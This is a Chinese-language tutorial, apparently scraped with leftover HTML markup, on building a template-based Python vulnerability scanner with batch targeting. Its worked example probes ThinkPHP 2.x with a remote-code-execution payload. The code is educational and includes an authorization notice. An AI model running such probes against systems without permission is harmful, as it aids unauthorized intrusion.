从零构建漏洞扫描器 - 详细教学文档<\/h1>

1. 项目概述<\/h2>
本教学文档将详细介绍如何从零开始构建一个自定义漏洞扫描器。该扫描器具有以下核心功能：<\/p>
支持单个URL扫描和批量文件扫描<\/li>
采用模块化模板设计，便于扩展新漏洞检测<\/li>
提供直观的结果输出<\/li>
具备基本的URL处理功能<\/li> <\/ul>
2. 系统架构设计<\/h2>

2.1 主程序框架<\/h3>
扫描器采用命令行界面，使用Python的argparse<\/code>模块处理用户输入：<\/p>
import<\/span> argparse
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    parser =<\/span> argparse.<\/span>ArgumentParser(description=<\/span>"漏洞扫描工具。"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument('-u'<\/span>, '--url'<\/span>, type=<\/span>str, help=<\/span>'单个目标扫描。'<\/span>)
<\/span><\/span>    parser.<\/span>add_argument('-f'<\/span>, '--file'<\/span>, type=<\/span>str, help=<\/span>'多目标批量扫描。'<\/span>)
<\/span><\/span>    parser.<\/span>add_argument('-t'<\/span>, '--template'<\/span>, type=<\/span>str, help=<\/span>'指定扫描模板文件。'<\/span>)
<\/span><\/span>    args =<\/span> parser.<\/span>parse_args()
<\/span><\/span>    
<\/span><\/span>    if<\/span> '-u'<\/span> in<\/span> sys.<\/span>argv and<\/span> '-t'<\/span> in<\/span> sys.<\/span>argv:
<\/span><\/span>        # 单个URL扫描逻辑<\/span>
<\/span><\/span>        pass<\/span>
<\/span><\/span>    elif<\/span> '-f'<\/span> in<\/span> sys.<\/span>argv and<\/span> '-t'<\/span> in<\/span> sys.<\/span>argv:
<\/span><\/span>        # 批量扫描逻辑<\/span>
<\/span><\/span>        pass<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        # 其他情况处理<\/span>
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>2.2 核心模块组成<\/h3>

主程序入口<\/strong>：处理命令行参数和流程控制<\/li>
模板系统<\/strong>：漏洞检测逻辑的实现<\/li>
URL处理模块<\/strong>：规范化输入URL<\/li>
结果输出模块<\/strong>：格式化显示扫描结果<\/li>
工具函数<\/strong>：辅助功能实现<\/li>
<\/ol>
3. 核心模块实现<\/h2>
3.1 漏洞模板系统<\/h3>
漏洞检测的核心是模板系统，采用面向对象设计：<\/p>
import<\/span> datetime
<\/span><\/span>from<\/span> urllib.parse import<\/span> urljoin
<\/span><\/span>import<\/span> requests
<\/span><\/span>from<\/span> PublicMethod import<\/span> host_to_ip
<\/span><\/span>from<\/span> PublicMethod import<\/span> success
<\/span><\/span>
<\/span><\/span>class<\/span> vul_scan<\/span>:
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        pass<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> vul_name<\/span>(url):
<\/span><\/span>        protocol, ip_address, port =<\/span> host_to_ip.<\/span>normalize_and_parse_url(url, host_to_ip=<\/span>False<\/span>)
<\/span><\/span>        target =<\/span> f<\/span>'<\/span>{<\/span>protocol}<\/span>:\/\/<\/span>{<\/span>ip_address}<\/span>:<\/span>{<\/span>port}<\/span>'<\/span>
<\/span><\/span>        
<\/span><\/span>        # 定义漏洞信息结构<\/span>
<\/span><\/span>        result =<\/span> {
<\/span><\/span>            'name'<\/span>: '漏洞名称'<\/span>,
<\/span><\/span>            'vulnerable'<\/span>: False<\/span>,
<\/span><\/span>            'method'<\/span>: 'None'<\/span>,
<\/span><\/span>            'url'<\/span>: url,
<\/span><\/span>            'payload'<\/span>: 'None'<\/span>
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        try<\/span>:
<\/span><\/span>            headers =<\/span> {
<\/span><\/span>                'User-Agent'<\/span>: 'Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident\/5.0)'<\/span>,
<\/span><\/span>            }
<\/span><\/span>            uri =<\/span> ''<\/span>
<\/span><\/span>            target =<\/span> urljoin(target, uri)
<\/span><\/span>            response =<\/span> requests.<\/span>get(url=<\/span>target, headers=<\/span>headers, timeout=<\/span>5<\/span>, verify=<\/span>False<\/span>)
<\/span><\/span>            
<\/span><\/span>            # 漏洞检测逻辑<\/span>
<\/span><\/span>            if<\/span> True<\/span>:  # 替换为实际的检测条件<\/span>
<\/span><\/span>                result['vulnerable'<\/span>] =<\/span> True<\/span>
<\/span><\/span>                result['method'<\/span>] =<\/span> 'POST'<\/span>
<\/span><\/span>                result['url'<\/span>] =<\/span> url
<\/span><\/span>                result['payload'<\/span>] =<\/span> uri
<\/span><\/span>                success.<\/span>VulExist(result)
<\/span><\/span>                return<\/span> result
<\/span><\/span>            else<\/span>:
<\/span><\/span>                return<\/span> result
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            return<\/span> result
<\/span><\/span>    
<\/span><\/span>    def<\/span> start_scan<\/span>(self):
<\/span><\/span>        return<\/span> vul_scan.<\/span>vul_name(self)
<\/span><\/span><\/code><\/pre>模板使用说明<\/h4>

每个漏洞检测应创建一个单独的类方法<\/li>
方法名应为漏洞名称（如thinkphp_2x_rce<\/code>）<\/li>
必须包含start_scan<\/code>方法作为统一入口<\/li>
检测逻辑应放在try块中，处理可能的网络异常<\/li>
<\/ol>
3.2 URL处理模块<\/h3>
host_to_ip.py<\/code>负责URL规范化处理：<\/p>
from<\/span> urllib.parse import<\/span> urlparse, urlunparse
<\/span><\/span>import<\/span> socket
<\/span><\/span>
<\/span><\/span>def<\/span> normalize_and_parse_url<\/span>(url, host_to_ip=<\/span>False<\/span>):
<\/span><\/span>    # 自动添加协议前缀<\/span>
<\/span><\/span>    if<\/span> not<\/span> url.<\/span>startswith(('http:\/\/'<\/span>, 'https:\/\/'<\/span>)):
<\/span><\/span>        url =<\/span> 'http:\/\/'<\/span> +<\/span> url if<\/span> ':\/\/'<\/span> not<\/span> in<\/span> url else<\/span> url
<\/span><\/span>    
<\/span><\/span>    parsed_url =<\/span> urlparse(url)
<\/span><\/span>    protocol =<\/span> parsed_url.<\/span>scheme
<\/span><\/span>    host =<\/span> parsed_url.<\/span>hostname
<\/span><\/span>    port =<\/span> parsed_url.<\/span>port or<\/span> (443<\/span> if<\/span> protocol ==<\/span> 'https'<\/span> else<\/span> 80<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 可选的主机名解析<\/span>
<\/span><\/span>    if<\/span> host_to_ip:
<\/span><\/span>        try<\/span>:
<\/span><\/span>            ip_address =<\/span> socket.<\/span>gethostbyname(host)
<\/span><\/span>        except<\/span> socket.<\/span>gaierror:
<\/span><\/span>            raise<\/span> ValueError<\/span>(f<\/span>"Cannot resolve hostname <\/span>{<\/span>host}<\/span> to an IP address"<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        ip_address =<\/span> host
<\/span><\/span>    
<\/span><\/span>    return<\/span> protocol, ip_address, port
<\/span><\/span><\/code><\/pre>3.3 结果输出模块<\/h3>
3.3.1 漏洞存在提示<\/h4>
success.py<\/code>处理漏洞检测成功的输出：<\/p>
import<\/span> base64
<\/span><\/span>from<\/span> colorama import<\/span> init, Fore, Style
<\/span><\/span>
<\/span><\/span>def<\/span> VulExist<\/span>(data):
<\/span><\/span>    data =<\/span> str(data)
<\/span><\/span>    init(autoreset=<\/span>True<\/span>)
<\/span><\/span>    
<\/span><\/span>    if<\/span> isinstance(data, str):
<\/span><\/span>        data_bytes =<\/span> data.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        data_bytes =<\/span> data
<\/span><\/span>    
<\/span><\/span>    encoded_bytes =<\/span> base64.<\/span>b64encode(data_bytes)
<\/span><\/span>    encoded_str =<\/span> encoded_bytes.<\/span>decode('utf-8'<\/span>)
<\/span><\/span>    
<\/span><\/span>    print(Fore.<\/span>CYAN +<\/span> encoded_str)
<\/span><\/span><\/code><\/pre>3.3.2 格式化表格输出<\/h4>
FormatOutput.py<\/code>提供美观的结果展示：<\/p>
from<\/span> prettytable import<\/span> PrettyTable
<\/span><\/span>from<\/span> termcolor import<\/span> colored
<\/span><\/span>
<\/span><\/span>def<\/span> FormatOutput<\/span>(data_list):
<\/span><\/span>    table =<\/span> PrettyTable()
<\/span><\/span>    table.<\/span>field_names =<\/span> ['name'<\/span>, 'method'<\/span>, 'url'<\/span>, 'payload'<\/span>, 'vulnerable'<\/span>]
<\/span><\/span>    table.<\/span>field_names =<\/span> [colored(field, attrs=<\/span>['bold'<\/span>]) for<\/span> field in<\/span> table.<\/span>field_names]
<\/span><\/span>    
<\/span><\/span>    for<\/span> index, data in<\/span> enumerate(data_list):
<\/span><\/span>        row_values =<\/span> [
<\/span><\/span>            data['name'<\/span>],
<\/span><\/span>            data['method'<\/span>],
<\/span><\/span>            data['url'<\/span>],
<\/span><\/span>            data['payload'<\/span>],
<\/span><\/span>            data['vulnerable'<\/span>]
<\/span><\/span>        ]
<\/span><\/span>        
<\/span><\/span>        # 根据漏洞状态着色<\/span>
<\/span><\/span>        if<\/span> data['vulnerable'<\/span>]:
<\/span><\/span>            row_values[4<\/span>] =<\/span> colored('True'<\/span>, 'green'<\/span>)
<\/span><\/span>        else<\/span>:
<\/span><\/span>            row_values[4<\/span>] =<\/span> colored('False'<\/span>, 'red'<\/span>)
<\/span><\/span>        
<\/span><\/span>        table.<\/span>add_row(row_values)
<\/span><\/span>        
<\/span><\/span>        # 添加分隔线<\/span>
<\/span><\/span>        if<\/span> index <<\/span> len(data_list) -<\/span> 1<\/span>:
<\/span><\/span>            table.<\/span>add_row(['-'<\/span> *<\/span> len(field) for<\/span> field in<\/span> table.<\/span>field_names])
<\/span><\/span>    
<\/span><\/span>    print(table)
<\/span><\/span><\/code><\/pre>3.4 模板加载系统<\/h3>
实现模板的动态加载和缓存：<\/p>
import<\/span> importlib.util
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>cached_module =<\/span> None<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> load_module<\/span>(module_path):
<\/span><\/span>    global<\/span> cached_module
<\/span><\/span>    if<\/span> cached_module is<\/span> None<\/span>:
<\/span><\/span>        module_name =<\/span> module_path.<\/span>replace('.py'<\/span>, ''<\/span>).<\/span>split('\/'<\/span>)[-<\/span>1<\/span>]
<\/span><\/span>        spec =<\/span> importlib.<\/span>util.<\/span>spec_from_file_location(module_name, module_path)
<\/span><\/span>        cached_module =<\/span> importlib.<\/span>util.<\/span>module_from_spec(spec)
<\/span><\/span>        sys.<\/span>modules[module_name] =<\/span> cached_module
<\/span><\/span>        spec.<\/span>loader.<\/span>exec_module(cached_module)
<\/span><\/span>    return<\/span> cached_module
<\/span><\/span>
<\/span><\/span>def<\/span> call_start_scan<\/span>(module, url):
<\/span><\/span>    if<\/span> hasattr(module, 'start_scan'<\/span>):
<\/span><\/span>        return<\/span> module.<\/span>start_scan(url)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print(f<\/span>"Function 'start_scan' not found in the module."<\/span>)
<\/span><\/span><\/code><\/pre>4. 主程序整合<\/h2>
将各模块整合到主程序中：<\/p>
if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    parser =<\/span> argparse.<\/span>ArgumentParser(description=<\/span>"漏洞扫描工具。"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument('-u'<\/span>, '--url'<\/span>, type=<\/span>str, help=<\/span>'单个目标扫描。'<\/span>)
<\/span><\/span>    parser.<\/span>add_argument('-f'<\/span>, '--file'<\/span>, type=<\/span>str, help=<\/span>'多目标批量扫描。'<\/span>)
<\/span><\/span>    parser.<\/span>add_argument('-t'<\/span>, '--template'<\/span>, type=<\/span>str, help=<\/span>'指定扫描模板文件。'<\/span>)
<\/span><\/span>    args =<\/span> parser.<\/span>parse_args()
<\/span><\/span>    
<\/span><\/span>    if<\/span> '-u'<\/span> in<\/span> sys.<\/span>argv and<\/span> '-t'<\/span> in<\/span> sys.<\/span>argv:
<\/span><\/span>        data_list =<\/span> []
<\/span><\/span>        module =<\/span> load_module(args.<\/span>template)
<\/span><\/span>        data =<\/span> call_start_scan(module, args.<\/span>url)
<\/span><\/span>        data_list.<\/span>append(data)
<\/span><\/span>        FormatOutput.<\/span>FormatOutput(data_list)
<\/span><\/span>    elif<\/span> '-f'<\/span> in<\/span> sys.<\/span>argv and<\/span> '-t'<\/span> in<\/span> sys.<\/span>argv:
<\/span><\/span>        try<\/span>:
<\/span><\/span>            data_list =<\/span> []
<\/span><\/span>            module =<\/span> load_module(args.<\/span>template)
<\/span><\/span>            with<\/span> open(args.<\/span>file, 'r'<\/span>) as<\/span> files:
<\/span><\/span>                file =<\/span> [line.<\/span>strip() for<\/span> line in<\/span> files if<\/span> line.<\/span>strip()]
<\/span><\/span>                for<\/span> url in<\/span> file:
<\/span><\/span>                    data =<\/span> call_start_scan(module, url)
<\/span><\/span>                    data_list.<\/span>append(data)
<\/span><\/span>            FormatOutput.<\/span>FormatOutput(data_list)
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            pass<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>5. 漏洞模板开发实例<\/h2>
以ThinkPHP 2.x RCE漏洞为例：<\/p>
import<\/span> datetime
<\/span><\/span>from<\/span> urllib.parse import<\/span> urljoin
<\/span><\/span>import<\/span> requests
<\/span><\/span>from<\/span> PublicMethod import<\/span> host_to_ip
<\/span><\/span>from<\/span> PublicMethod import<\/span> success
<\/span><\/span>
<\/span><\/span>class<\/span> vul_scan<\/span>:
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        pass<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> thinkphp_2x_rce<\/span>(url):
<\/span><\/span>        protocol, ip_address, port =<\/span> host_to_ip.<\/span>normalize_and_parse_url(url, host_to_ip=<\/span>False<\/span>)
<\/span><\/span>        target =<\/span> f<\/span>'<\/span>{<\/span>protocol}<\/span>:\/\/<\/span>{<\/span>ip_address}<\/span>:<\/span>{<\/span>port}<\/span>'<\/span>
<\/span><\/span>        
<\/span><\/span>        result =<\/span> {
<\/span><\/span>            'name'<\/span>: 'thinkphp_2x_rce'<\/span>,
<\/span><\/span>            'vulnerable'<\/span>: False<\/span>,
<\/span><\/span>            'method'<\/span>: 'None'<\/span>,
<\/span><\/span>            'url'<\/span>: url,
<\/span><\/span>            'payload'<\/span>: 'None'<\/span>
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        try<\/span>:
<\/span><\/span>            headers =<\/span> {
<\/span><\/span>                'User-Agent'<\/span>: 'Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident\/5.0)'<\/span>,
<\/span><\/span>            }
<\/span><\/span>            uri =<\/span> '?s=\/sec\/test\/00\/${var_dump(md5(9527))}'<\/span>
<\/span><\/span>            target =<\/span> urljoin(target, uri)
<\/span><\/span>            response =<\/span> requests.<\/span>get(url=<\/span>target, headers=<\/span>headers, timeout=<\/span>5<\/span>, verify=<\/span>False<\/span>)
<\/span><\/span>            
<\/span><\/span>            if<\/span> '52569c045dc348f12dfc4c85000ad832'<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>                result['vulnerable'<\/span>] =<\/span> True<\/span>
<\/span><\/span>                result['method'<\/span>] =<\/span> 'POST'<\/span>
<\/span><\/span>                result['url'<\/span>] =<\/span> url
<\/span><\/span>                result['payload'<\/span>] =<\/span> uri
<\/span><\/span>                success.<\/span>VulExist(result)
<\/span><\/span>                return<\/span> result
<\/span><\/span>            else<\/span>:
<\/span><\/span>                return<\/span> result
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            return<\/span> result
<\/span><\/span>    
<\/span><\/span>    def<\/span> start_scan<\/span>(self):
<\/span><\/span>        return<\/span> vul_scan.<\/span>thinkphp_2x_rce(self)
<\/span><\/span><\/code><\/pre>6. 使用示例<\/h2>
6.1 单个URL扫描<\/h3>
python scanner.py -u http:\/\/target.com:8080 -t thinkphp_2x_rce.py
<\/span><\/span><\/code><\/pre>6.2 批量扫描<\/h3>
python scanner.py -f targets.txt -t thinkphp_2x_rce.py
<\/span><\/span><\/code><\/pre>其中targets.txt<\/code>内容格式为每行一个URL：<\/p>
http:\/\/target1.com
http:\/\/target2.com:8080
192.168.1.100
<\/code><\/pre>
7. 优化建议<\/h2>

多线程支持<\/strong>：使用threading<\/code>或multiprocessing<\/code>模块提高扫描效率<\/li>
默认模板<\/strong>：当不指定模板时，自动加载默认模板集<\/li>
多模板扫描<\/strong>：支持一次指定多个模板文件进行综合扫描<\/li>
代理支持<\/strong>：添加-p\/--proxy<\/code>参数支持代理设置<\/li>
结果保存<\/strong>：添加-o\/--output<\/code>参数支持结果保存到文件<\/li>
进度显示<\/strong>：添加扫描进度条显示<\/li>
超时配置<\/strong>：允许用户自定义请求超时时间<\/li>
重试机制<\/strong>：对失败的请求添加自动重试功能<\/li>
<\/ol>
8. 扩展开发指南<\/h2>
8.1 开发新漏洞模板<\/h3>

复制现有模板文件并重命名<\/li>
修改类方法名为漏洞名称<\/li>
实现具体的漏洞检测逻辑<\/li>
更新result<\/code>字典中的漏洞信息<\/li>
确保start_scan<\/code>方法正确调用新的检测方法<\/li>
<\/ol>
8.2 添加新功能<\/h3>

认证支持<\/strong>：添加对需要认证的目标的支持<\/li>
自定义头<\/strong>：允许用户自定义请求头<\/li>
速率限制<\/strong>：添加请求速率控制<\/li>
插件系统<\/strong>：设计插件架构支持功能扩展<\/li>
API接口<\/strong>：添加REST API接口支持远程调用<\/li>
<\/ol>
9. 安全注意事项<\/h2>

扫描前应获得目标系统的授权<\/li>
避免使用过于激进的检测方式可能导致服务中断<\/li>
注意处理敏感信息，如认证凭据等<\/li>
考虑添加扫描速率限制避免对目标造成过大负载<\/li>
确保工具本身的安全性，避免成为攻击媒介<\/li>
<\/ol>
10. 总结<\/h2>
本教学文档详细介绍了从零开始构建漏洞扫描器的全过程，包括：<\/p>

系统架构设计<\/li>
核心模块实现<\/li>
模板开发方法<\/li>
使用示例<\/li>
优化建议<\/li>
扩展开发指南<\/li>
<\/ul>
通过本指南，开发者可以快速掌握漏洞扫描器的开发方法，并根据实际需求进行功能扩展和定制开发。<\/p>